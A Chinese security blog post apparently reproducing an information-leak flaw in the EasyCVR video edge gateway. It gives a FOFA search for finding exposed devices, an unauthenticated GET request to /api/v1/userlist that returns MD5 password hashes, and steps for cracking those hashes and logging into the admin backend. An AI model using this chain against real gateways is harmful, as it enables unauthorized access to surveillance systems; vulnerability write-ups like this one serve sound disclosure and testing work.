漏洞复现--EasyCVR智能边缘网关未授权访问

最新推荐文章于 2024-06-19 16:13:28 发布
最新推荐文章于 2024-06-19 16:13:28 发布
阅读量410 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/133738491
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

一:漏洞描述

EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。该设备userlist接口存在信息泄露,攻击者可获得md5加密后的密码以进行后续测试。

二:漏洞影响版本

–EasyCVR智能边缘网关

三:网络空间测绘查询

fofa:title="EasyCVR"
image.png

四:漏洞复现

poc:
GET /api/v1/userlist?pageindex=0&pagesize=10
image.png
image.png
cmd5解密
image.png
登录后台
image.png

芝士土包鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【1day】复现EasyCVR智能边缘网关 userlist 信息泄漏漏洞
记录并分享学习安全的知识点..
10-04 282
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关 存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
视频监控汇聚平台EasyCVR授权访问用户信息泄漏复现 [附POC]
薛定谔嘚喵博客
10-26 327
EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
EasyCVR智能边缘网关授权访问用户信息泄露漏洞
CommputerMac的博客
10-09 744
EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍,对异常情况进行智能提醒和通知,可广泛应用于安防监控、智能检测、通行核验等场景。或浏览器直接访问路径 /api/v1/userlist?EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。然后将md5加密后的密码解密。
EasyCVR视频管理平台 授权访问漏洞复现
10-18 474
EasyCVR是一款智能、全面的安防视频监控平台,由青犀视频的TSINGSEE团队开发和维护。该平台旨在帮助大中型用户实现跨区域网络化视频监控的集中管理,具有信息资源管理、设备管理、用户管理、网络管理以及安全管理等一系列功能。
EasyCVR云边端技术如何助力视频监控实现高效管理与安全监控
最新发布
EasyCVR视频融合云平台的技术博客
06-19 841
这种下沉不仅提高了服务的响应速度和可靠性,还使得AI能力能够更贴近用户的使用场景。同时,结合灵活调配的AI算力,视频云边端架构能够不断赋能边缘端,推动边缘计算的发展和应用。
EasyCVR智能边缘网关用户信息泄漏漏洞
weixin_44304678的博客
11-02 266
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
EasyCVR加密机授权出现报错问题的排查解决及注意事项
EasyCVR视频融合云平台的技术博客
09-13 195
如有用户出现上述同样的情况,可参照该方法进行配置。若有无法解决的问题,可联系我们协助排查。
EasyCVR智能边缘网关+EasyGBS国标云平台助力智慧环保.docx
10-26
一种是当4G硬盘录像机定制WiFi功能时,通过有线方式与EasyCVR智能边缘网关连接,并额外安装4G路由器实现外网连接;另一种则是当4G硬盘录像机已定制WiFi功能时,EasyCVR智能边缘网关也定制WiFi功能,直接通过WiFi...
零点自动化_Modbus-RTU转PROFINET智能网关GSD文件.rar
12-24
零点自动化(Modbus-RTU转PROFINET智能网关)是工业自动化领域中一种重要的设备,它主要用于连接使用Modbus-RTU协议的设备与采用PROFINET通信标准的系统。这款智能网关的核心功能在于它能够实现两种不同通信协议间的...
DSGW-230 边缘计算多协议网关 快速指南
08-18
DSGW-230是一款专为物联网(IoT)设计的智能边缘计算网关,它集成了多种通信协议,可适应不同类型的无线设备,为用户提供高效且灵活的连接解决方案。这款产品由杭州软库科技有限公司研发,该公司在物联网领域具有...
DSGW-290 Dusun Pi4 边缘计算网关 快速指南
08-18
【DSGW-290 Dusun Pi4 边缘计算网关 快速指南】 在物联网(IoT)领域,边缘计算网关扮演着至关重要的角色,它们负责收集、处理和转发来自各种设备的数据,减少了对云端资源的依赖,提高了数据处理效率和安全性。Dusun...
---gateway---网关
10-13
---gateway---网关
视频融合平台EasyCVR激活码授权不成功的原因排查与解决
EasyCVR视频融合云平台的技术博客
06-27 112
在平台运行正常,且授权信息准确的条件下,用户若出现授权无效的情况,可以先确认服务器时间是否正确。
EasyCVR平台安全扫描提示Go pprof调试信息泄露的解决办法
TSINGSEE青犀视频官方技术博客
07-21 1680
EasyCVR部署简单、兼容性高,平台采用分布式部署,可对外提供统一的API接口,实现连接设备、连接数据、连接应用,便于第三方平台快速集成。
浅谈“授权访问漏洞
热门推荐
→_→
07-26 1万+
一:漏洞名称: 授权访问漏洞 描述: 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。 检测条件: 已知Web网站具有登录页面。或者具有不允许访问的目录或功能。 不用登录,可通过链接直接访问用户页面功能。 检测方法: 通过对登录后的页面进行抓包,将抓取到的功能链接,在其他浏览器进行打开, 也可以通过web扫描工具进行扫描,爬虫得到相关地址链接,进.
AI大数据可视化EasyCVR视频融合平台的部署操作流程详解
EasyCVR视频融合云平台的技术博客
04-21 1246
很多用户在接触到我们的EasyCVR平台后,不知道如何部署,导致出现了服务运行异常的情况。今天我们来分享一下EasyCVR平台的正确部署流程。
【FAQ】安防监控系统/视频云存储EasyCVR平台安全检查Proxy出现sql injection的漏洞,该如何修改?
AI与流媒体视频技术
09-21 119
视频云存储/安防监控EasyCVR视频汇聚平台基于云边端智能协同,支持海量视频的轻量化接入与汇聚、转码与处理、全网智能分发、视频集中存储等。
漏洞复现EasyCVR智能边缘网关用户信息泄漏漏洞
晚风不及你
02-08 808
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。
EasyCVR视频融合平台的视频处理与AI智能分析流程实操案例介绍
EasyCVR视频融合云平台的技术博客
03-02 923
该园区项目现场属于内网环境,可以通过RTSP协议将摄像头统一接入到EasyCVR视频融合平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值